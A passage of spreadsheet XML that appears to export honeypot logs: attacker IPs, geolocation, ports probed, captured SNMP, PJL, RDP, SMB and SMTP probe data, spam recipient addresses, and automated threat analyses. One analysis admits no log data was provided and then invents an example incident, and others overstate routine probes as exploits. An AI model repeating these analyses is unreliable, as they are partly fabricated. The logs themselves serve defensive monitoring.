    <t>fc84405e202e6a21ba9e6dc9802b2b48</t>
  </si>
  <si>
    <t>110.24.32.8</t>
  </si>
  <si>
    <t>110-24-32-8.adsl.fetnet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_VNC_H20&amp;&amp;SMA-LAB_LDAP_H29&amp;&amp;SMA-LAB_SOCKS5_H30&amp;&amp;SMA-LAB_IPP_H40&amp;&amp;SMA-LAB_HTTPS_H13&amp;&amp;SMA-LAB_SMB_H29&amp;&amp;SMA-LAB_HTTP_H34&amp;&amp;SMA-LAB_SSH_H25&amp;&amp;SMA-LAB_MT-CPA_H33&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H9</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;5900&amp;&amp;389&amp;&amp;1080&amp;&amp;631&amp;&amp;443&amp;&amp;445&amp;&amp;80&amp;&amp;22&amp;&amp;10310&amp;&amp;23&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:6e18:2008</t>
  </si>
  <si>
    <t>96bfc574baaffcb533b20137fe54f429</t>
  </si>
  <si>
    <t>117.242.46.121</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_MT-CPA_H36&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H19</t>
  </si>
  <si>
    <t>23&amp;&amp;21655&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:75f2:2e79</t>
  </si>
  <si>
    <t>ccaadf8ea66d588feba1780dd075a8c8</t>
  </si>
  <si>
    <t>141.98.10.50</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:mail'&amp;&amp; 'attack-target:sip']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Spam Message Body&amp;&amp;Session Manipulation</t>
  </si>
  <si>
    <t>SMA-LAB_SMTP_HC1&amp;&amp;SMA-LAB_DNS_H44</t>
  </si>
  <si>
    <t>25&amp;&amp;53&amp;&amp;NA&amp;&amp;27160</t>
  </si>
  <si>
    <t>connection&amp;&amp;query&amp;&amp;NA</t>
  </si>
  <si>
    <t>{Data_SMTP:{'arg': 'to:&lt;spameri@tiscali.it&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'DATA', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'QUIT', 'data': 'None'}}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'FROM:&lt;test@fuse.net&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;agicash@hotmail.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;evansvenzina@gmail.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;antonio_guterres1@mail.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;stevenvoors@aol.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;susanaarnold@outlook.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;abidoshaakacompanies@hotmail.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;abidoshaakacompanies11@hotmail.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_DNS:NA}&amp;&amp;{Data_DNS:&lt;TXT data=['Generation Time: 1739907910'] ttl=894&gt;}&amp;&amp;{Data_DNS:&lt;NS name=ns2.neoip.com ttl=894&gt;}&amp;&amp;{Data_DNS:&lt;NS name=ns1.neoip.com ttl=894&gt;}&amp;&amp;NA&amp;&amp;{Data_DNS:&lt;SOA mname=ns1.neoip.com.sl rname=adam.neoip.com serial=2915299317 refresh=600 retry=900 expire=7200 minimum=3600 ttl=20481&gt;}&amp;&amp;{Data_DNS:&lt;TXT data=['Generation Time: 1741902309'] ttl=681&gt;}&amp;&amp;{Data_DNS:&lt;NS name=ns1.neoip.com ttl=681&gt;}&amp;&amp;{Data_DNS:&lt;NS name=ns2.neoip.com ttl=681&gt;}&amp;&amp;{Data_DNS:&lt;SOA mname=ns1.neoip.com.sl rname=adam.neoip.com serial=2915299323 refresh=600 retry=900 expire=7200 minimum=3600 ttl=20480&gt;}&amp;&amp;{Data_DNS:&lt;TXT data=['Generation Time: 1741905906'] ttl=680&gt;}&amp;&amp;{Data_DNS:&lt;NS name=ns1.neoip.com ttl=680&gt;}&amp;&amp;{Data_DNS:&lt;NS name=ns2.neoip.com ttl=680&gt;}&amp;&amp;{Data_DNS:&lt;SOA mname=ns1.neoip.com.sl rname=adam.neoip.com serial=2915299335 refresh=600 retry=900 expire=7200 minimum=3600 ttl=20096&gt;}&amp;&amp;{Data_DNS:&lt;NS name=ns1.neoip.com ttl=296&gt;}&amp;&amp;{Data_DNS:&lt;NS name=ns2.neoip.com ttl=296&gt;}&amp;&amp;{Data_DNS:&lt;TXT data=['Generation Time: 1741912211'] ttl=296&gt;}&amp;&amp;{Data_DNS:&lt;SOA mname=ns1.neoip.com.sl rname=adam.neoip.com serial=2915299337 refresh=600 retry=900 expire=7200 minimum=3600 ttl=20484&gt;}&amp;&amp;{Data_DNS:&lt;TXT data=['Generation Time: 1741913101'] ttl=684&gt;}&amp;&amp;{Data_DNS:&lt;NS name=ns1.neoip.com ttl=684&gt;}&amp;&amp;{Data_DNS:&lt;NS name=ns2.neoip.com ttl=684&gt;}&amp;&amp;{Data_DNS:&lt;SOA mname=ns1.neoip.com.sl rname=adam.neoip.com serial=2915299360 refresh=600 retry=900 expire=7200 minimum=3600 ttl=20487&gt;}&amp;&amp;{Data_DNS:&lt;TXT data=['Generation Time: 1741927510'] ttl=687&gt;}&amp;&amp;{Data_DNS:&lt;NS name=ns2.neoip.com ttl=687&gt;}&amp;&amp;{Data_DNS:&lt;NS name=ns1.neoip.com ttl=687&gt;}&amp;&amp;{Data_DNS:&lt;SOA mname=ns1.neoip.com.sl rname=adam.neoip.com serial=2915299359 refresh=600 retry=900 expire=7200 minimum=3600 ttl=20149&gt;}&amp;&amp;{Data_DNS:&lt;SOA mname=ns1.neoip.com.sl rname=adam.neoip.com serial=2915299376 refresh=600 retry=900 expire=7200 minimum=3600 ttl=20745&gt;}&amp;&amp;{Data_DNS:&lt;TXT data=['Generation Time: 1741938311'] ttl=945&gt;}&amp;&amp;{Data_DNS:&lt;NS name=ns2.neoip.com ttl=945&gt;}&amp;&amp;{Data_DNS:&lt;NS name=ns1.neoip.com ttl=945&gt;}&amp;&amp;{Data_DNS:&lt;NS name=ns2.neoip.com ttl=439&gt;}&amp;&amp;{Data_DNS:&lt;NS name=ns1.neoip.com ttl=439&gt;}&amp;&amp;{Data_DNS:&lt;TXT data=['Generation Time: 1741941012'] ttl=439&gt;}&amp;&amp;{Data_DNS:&lt;SOA mname=ns1.neoip.com.sl rname=adam.neoip.com serial=2915299383 refresh=600 retry=900 expire=7200 minimum=3600 ttl=20518&gt;}&amp;&amp;{Data_DNS:&lt;TXT data=['Generation Time: 1741941902'] ttl=718&gt;}&amp;&amp;{Data_DNS:&lt;NS name=ns2.neoip.com ttl=718&gt;}&amp;&amp;{Data_DNS:&lt;NS name=ns1.neoip.com ttl=718&gt;}&amp;&amp;{Data_DNS:&lt;SOA mname=ns1.neoip.com.sl rname=adam.neoip.com serial=2915299412 refresh=600 retry=900 expire=7200 minimum=3600 ttl=20485&gt;}&amp;&amp;{Data_DNS:&lt;TXT data=['Generation Time: 1741956313'] ttl=685&gt;}&amp;&amp;{Data_DNS:&lt;NS name=ns1.neoip.com ttl=685&gt;}&amp;&amp;{Data_DNS:&lt;NS name=ns2.neoip.com ttl=685&gt;}&amp;&amp;{Data_DNS:&lt;SOA mname=ns1.neoip.com.sl rname=adam.neoip.com serial=2915299428 refresh=600 retry=900 expire=7200 minimum=3600 ttl=20617&gt;}&amp;&amp;{Data_DNS:&lt;TXT data=['Generation Time: 1741963509'] ttl=817&gt;}&amp;&amp;{Data_DNS:&lt;NS name=ns1.neoip.com ttl=817&gt;}&amp;&amp;{Data_DNS:&lt;NS name=ns2.neoip.com ttl=817&gt;}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'RSET', 'data': 'None'}}</t>
  </si>
  <si>
    <t>::ffff:8d62:a32</t>
  </si>
  <si>
    <t>No log data provided to analyze.
However, if we were to imagine some typical honeypot log entries, here's an example analysis:
The IP 192.168.1.100 attempted to connect to the open SSH service on a server with the username "admin". This could be a brute-force login attempt or a reconnaissance activity. The attacker may be trying to gain unauthorized access to sensitive data. &amp;&amp; Possible brute-force login attempt against SMTP service, as there is no activity detected but still a record of attempted access. No incoming or outgoing SMTP traffic was recorded. This may indicate someone trying to access the email server without being successful. &amp;&amp; Possible malicious activity detected, SMTP server received command "RSET" without any arguments or data, which may be an attempt to reset the SMTP connection for further malicious actions. This could be a reconnaissance phase by an attacker. It might also indicate an attempt to exploit a vulnerability in the SMTP service. &amp;&amp; This log indicates a possible attempt to reset the SMTP connection, potentially indicating an attacker trying to manipulate or disrupt legitimate email traffic by issuing unauthorized commands. The command RSET is typically used for resetting the mail transaction in a valid SMTP conversation. This may be part of a larger malicious activity to compromise the system's email services.</t>
  </si>
  <si>
    <t>c5ec4d4f57636934f2fbc5a62f216acf</t>
  </si>
  <si>
    <t>210.217.59.205</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_MSSQL_H27&amp;&amp;SMA-LAB_MSSQL_H30&amp;&amp;SMA-LAB_MSSQL_H7&amp;&amp;SMA-LAB_MSSQL_H45&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_MSSQL_H18&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H34&amp;&amp;SMA-LAB_MSSQL_H16</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;21379&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:d2d9:3bcd</t>
  </si>
  <si>
    <t>0a9f88ccd44fc2be42cd59f973f97451</t>
  </si>
  <si>
    <t>117.194.22.253</t>
  </si>
  <si>
    <t>::ffff:75c2:16fd</t>
  </si>
  <si>
    <t>f19e945ba2eb67555bb1b49ef3718915</t>
  </si>
  <si>
    <t>111.254.201.239</t>
  </si>
  <si>
    <t>111-254-201-239.dynamic-ip.hinet.net</t>
  </si>
  <si>
    <t>HINET</t>
  </si>
  <si>
    <t>::ffff:6ffe:c9ef</t>
  </si>
  <si>
    <t>b1a24a0f2632b2caeb905794b5a831d6</t>
  </si>
  <si>
    <t>198.235.24.18</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_POP3_H37&amp;&amp;SMA-LAB_POSTGRES_H8&amp;&amp;SMA-LAB_IMAP_H19&amp;&amp;SMA-LAB_LDAP_H47&amp;&amp;SMA-LAB_IMAP_H21&amp;&amp;SMA-LAB_SOCKS5_H16&amp;&amp;SMA-LAB_MYSQL_H22&amp;&amp;SMA-LAB_POSTGRES_H44&amp;&amp;SMA-LAB_MYSQL_H47&amp;&amp;SMA-LAB_MT-CPA_H6&amp;&amp;SMA-LAB_SNMP_H7&amp;&amp;SMA-LAB_LDAP_H45&amp;&amp;SMA-LAB_ORACLE_H27&amp;&amp;SMA-LAB_SIP_H39&amp;&amp;SMA-LAB_SOCKS5_H2&amp;&amp;SMA-LAB_POSTGRES_H5&amp;&amp;SMA-LAB_POSTGRES_H41&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_SOCKS5_H26&amp;&amp;SMA-LAB_SOCKS5_H37&amp;&amp;SMA-LAB_SNMP_H28&amp;&amp;SMA-LAB_ORACLE_H39&amp;&amp;SMA-LAB_IRC_H22&amp;&amp;SMA-LAB_RDP_H26&amp;&amp;SMA-LAB_RDP_H47&amp;&amp;SMA-LAB_POSTGRES_HC1&amp;&amp;SMA-LAB_MSSQL_H29&amp;&amp;SMA-LAB_SNMP_H29&amp;&amp;SMA-LAB_VNC_H28&amp;&amp;SMA-LAB_MYSQL_H5&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_SOCKS5_H21&amp;&amp;SMA-LAB_FTP_H26&amp;&amp;SMA-LAB_MSSQL_H4&amp;&amp;SMA-LAB_IMAP_H13&amp;&amp;SMA-LAB_POP3_H34&amp;&amp;SMA-LAB_POSTGRES_H46&amp;&amp;SMA-LAB_FTP_H10&amp;&amp;SMA-LAB_POSTGRES_H26&amp;&amp;SMA-LAB_SIP_H41&amp;&amp;SMA-LAB_SOCKS5_H10&amp;&amp;SMA-LAB_POP3_H26&amp;&amp;SMA-LAB_FTP_H3</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;110&amp;&amp;5432&amp;&amp;143&amp;&amp;389&amp;&amp;1080&amp;&amp;3306&amp;&amp;47219&amp;&amp;161&amp;&amp;1521&amp;&amp;NA&amp;&amp;5900&amp;&amp;6667&amp;&amp;3389&amp;&amp;1433&amp;&amp;54729&amp;&amp;9100&amp;&amp;21&amp;&amp;80&amp;&amp;56086&amp;&amp;54953&amp;&amp;23&amp;&amp;443&amp;&amp;57155</t>
  </si>
  <si>
    <t>connection&amp;&amp;request&amp;&amp;command&amp;&amp;query&amp;&amp;GET&amp;&amp;NA&amp;&amp;stshash</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'User-Agent': 'Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&amp;#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0', 'version': '0'}}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1', 'version': '1'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=DigSkGCdR'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=nPOsNs'}}&amp;&amp;{Data_HTTPS:{'Host': 'vmi1321981.contaboserver.net', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}</t>
  </si>
  <si>
    <t>::ffff:c6eb:1812</t>
  </si>
  <si>
    <t>The data suggests an attempt to access PostgreSQL database services, potentially for unauthorized purposes such as password cracking or SQL injection attacks. This could be a reconnaissance scan or a malicious probe seeking vulnerabilities. It indicates possible attempts to exploit the database system. &amp;&amp; Unknown FTP activity detected, possibly an attempt to connect or scan for vulnerabilities.
No specific FTP commands were issued during this interaction.
This may indicate a reconnaissance or scanning operation by a malicious entity. &amp;&amp; Malicious printer exploitation attempt detected, where an attacker sent a command to retrieve printer information.
The attacker is likely trying to gather sensitive information about the system's printing capabilities.
This could be a reconnaissance step for further attacks. &amp;&amp; Possible malicious activity is a printer exploit attempt where an attacker is sending a command to retrieve information about the device. The command is likely used to gather sensitive information or potentially execute further malicious actions. This could be part of a larger print server or network vulnerability exploitation.</t>
  </si>
  <si>
    <t>Printer Hack &amp;&amp; PortScan</t>
  </si>
  <si>
    <t>e27d6686bbfb8caae454c211e8b6688a</t>
  </si>
  <si>
    <t>205.210.31.5</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:sip']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SNMP_H45&amp;&amp;SMA-LAB_SOCKS5_H26&amp;&amp;SMA-LAB_HTTP_H24&amp;&amp;SMA-LAB_RDP_H19&amp;&amp;SMA-LAB_MT-CPA_H36&amp;&amp;SMA-LAB_RDP_H42&amp;&amp;SMA-LAB_SOCKS5_H33&amp;&amp;SMA-LAB_POP3_H22&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_MT-CPA_H30&amp;&amp;SMA-LAB_SOCKS5_H29&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_FTP_H39&amp;&amp;SMA-LAB_ORACLE_H26&amp;&amp;SMA-LAB_MYSQL_H5&amp;&amp;SMA-LAB_FTP_H30&amp;&amp;SMA-LAB_SNMP_H39&amp;&amp;SMA-LAB_SIP_H16&amp;&amp;SMA-LAB_POP3_H32&amp;&amp;SMA-LAB_MYSQL_H3&amp;&amp;SMA-LAB_VNC_H22&amp;&amp;SMA-LAB_SNMP_H5&amp;&amp;SMA-LAB_PJL_H39&amp;&amp;SMA-LAB_PJL_H31&amp;&amp;SMA-LAB_SNMP_H12&amp;&amp;SMA-LAB_MYSQL_H40&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_IMAP_H44&amp;&amp;SMA-LAB_PJL_H12&amp;&amp;SMA-LAB_PJL_H38&amp;&amp;SMA-LAB_FTP_H17&amp;&amp;SMA-LAB_SNMP_H14&amp;&amp;SMA-LAB_REDIS_H11&amp;&amp;SMA-LAB_MSSQL_H3&amp;&amp;SMA-LAB_IMAP_H40&amp;&amp;SMA-LAB_POSTGRES_HC1&amp;&amp;SMA-LAB_FTP_H28&amp;&amp;SMA-LAB_FTP_H26&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_RDP_H6</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;161&amp;&amp;1080&amp;&amp;3389&amp;&amp;54262&amp;&amp;110&amp;&amp;23&amp;&amp;32677&amp;&amp;21&amp;&amp;1521&amp;&amp;3306&amp;&amp;NA&amp;&amp;5900&amp;&amp;9100&amp;&amp;143&amp;&amp;6379&amp;&amp;1433&amp;&amp;5432&amp;&amp;80&amp;&amp;389&amp;&amp;6667</t>
  </si>
  <si>
    <t>{'all.s5h.net': ['unknown']&amp;&amp; 'cbl.abuseat.org': ['unknown']}</t>
  </si>
  <si>
    <t>connection&amp;&amp;command&amp;&amp;GET&amp;&amp;request&amp;&amp;query&amp;&amp;stshash</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'User-Agent': 'Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&amp;#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0', 'version': '0'}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1', 'version': '1'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=TSHdqyHEQ'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=cmrwpi'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=mMVGcI'}}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=qelYpuUjH'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=MVTonm'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=YdvGCMZxZ'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=tOjJrU'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=zToSBy'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_HTTP:{'Host': 'vmi1261124.contaboserver.net', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:cdd2:1f05</t>
  </si>
  <si>
    <t>018a6f9048bb25fa4095678da92d0b32</t>
  </si>
  <si>
    <t>80.232.250.19</t>
  </si>
  <si>
    <t>LV</t>
  </si>
  <si>
    <t>Latvia</t>
  </si>
  <si>
    <t>RIX</t>
  </si>
  <si>
    <t>Riga</t>
  </si>
  <si>
    <t>Rīga</t>
  </si>
  <si>
    <t>Riga (Centra rajons)</t>
  </si>
  <si>
    <t>456172</t>
  </si>
  <si>
    <t>LV-1011</t>
  </si>
  <si>
    <t>56.9514</t>
  </si>
  <si>
    <t>24.1238</t>
  </si>
  <si>
    <t>12578</t>
  </si>
  <si>
    <t>SIA Tet</t>
  </si>
  <si>
    <t>LATTELEKOM</t>
  </si>
  <si>
    <t>Bridge Group</t>
  </si>
  <si>
    <t>2001-10-03</t>
  </si>
  <si>
    <t>::ffff:50e8:fa13</t>
  </si>
  <si>
    <t>a703a95afcc5aca9ca19a11a85b0f364</t>
  </si>
  <si>
    <t>201.166.173.116</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H47&amp;&amp;SMA-LAB_SMB_H19&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H27&amp;&amp;SMA-LAB_SMB_H38&amp;&amp;SMA-LAB_MT-CPA_H38&amp;&amp;SMA-LAB_SMB_H22&amp;&amp;SMA-LAB_SMB_H32&amp;&amp;SMA-LAB_SMB_H26</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;1433&amp;&amp;16944</t>
  </si>
  <si>
    <t>JAL</t>
  </si>
  <si>
    <t>Jalisco</t>
  </si>
  <si>
    <t>Tamazula de Gordiano Municipality</t>
  </si>
  <si>
    <t>Callejones</t>
  </si>
  <si>
    <t>8861137</t>
  </si>
  <si>
    <t>19.6683</t>
  </si>
  <si>
    <t>-103.263</t>
  </si>
  <si>
    <t>7438</t>
  </si>
  <si>
    <t>Pegaso PCS, S.A. de C.V.</t>
  </si>
  <si>
    <t>Pegaso PCS</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (201.166.173.116,16595)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (201.166.173.116,16265)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (201.166.173.116,7319)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (201.166.173.116,7336)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (201.166.173.116,14255)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (201.166.173.116,19534)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (201.166.173.116,20225)}&amp;&amp;{Data_SMB:Incoming connection (201.166.173.116,20289)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (201.166.173.116,24001)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (201.166.173.116,12449)}&amp;&amp;{Data_SMB:Incoming connection (201.166.173.116,12577)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (201.166.173.116,17346)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (201.166.173.116,7112)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (201.166.173.116,7841)}&amp;&amp;{Data_SMB:Incoming connection (201.166.173.116,7969)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (201.166.173.116,18977)}&amp;&amp;{Data_SMB:Incoming connection (201.166.173.116,19170)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (201.166.173.116,19679)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (201.166.173.116,19685)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (201.166.173.116,4900)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (201.166.173.116,17102)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (201.166.173.116,6171)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (201.166.173.116,48833)}&amp;&amp;{Data_SMB:Incoming connection (201.166.173.116,49153)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (201.166.173.116,52833)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (201.166.173.116,2516)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (201.166.173.116,4371)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (201.166.173.116,4382)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (201.166.173.116,11863)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (201.166.173.116,15831)}&amp;&amp;{Data_SMB:Incoming connection (201.166.173.116,15837)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (201.166.173.116,18796)}&amp;&amp;{Data_SMB:Incoming connection (201.166.173.116,18805)}&amp;&amp;{Data_SMB:Incoming connection (201.166.173.116,3826)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (201.166.173.116,3837)}&amp;&amp;{Data_SMB:Incoming connection (201.166.173.116,3332)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (201.166.173.116,50977)}&amp;&amp;{Data_SMB:Incoming connection (201.166.173.116,6297)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (201.166.173.116,6306)}&amp;&amp;{Data_SMB:User  authenticated successfully 